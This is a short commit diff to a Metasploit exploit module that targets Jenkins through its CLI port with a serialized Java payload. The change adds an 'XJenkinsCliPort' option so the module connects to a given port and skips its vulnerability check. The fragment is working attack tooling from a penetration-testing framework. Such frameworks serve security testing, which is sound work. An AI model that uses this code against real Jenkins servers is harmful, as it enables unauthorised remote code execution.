parent
be8d6df093
commit
d60dcf72f9
|
@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
|
||||
Opt::RPORT('8080')
|
||||
], self.class)
|
||||
|
||||
register_advanced_options([
|
||||
OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def cli_port
|
||||
@jenkins_cli_port || datastore['XJenkinsCliPort']
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless vulnerable?
|
||||
unless cli_port || vulnerable?
|
||||
fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
|
||||
end
|
||||
invoke_remote_method(set_payload)
|
||||
|
@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def invoke_remote_method(serialized_java_stream)
|
||||
begin
|
||||
socket = connect(true, {'RPORT' => @jenkins_cli_port})
|
||||
socket = connect(true, {'RPORT' => cli_port})
|
||||
|
||||
print_status 'Sending headers...'
|
||||
socket.put(read_bin_file('serialized_jenkins_header'))
|
||||
|
|
Loading…
Reference in New Issue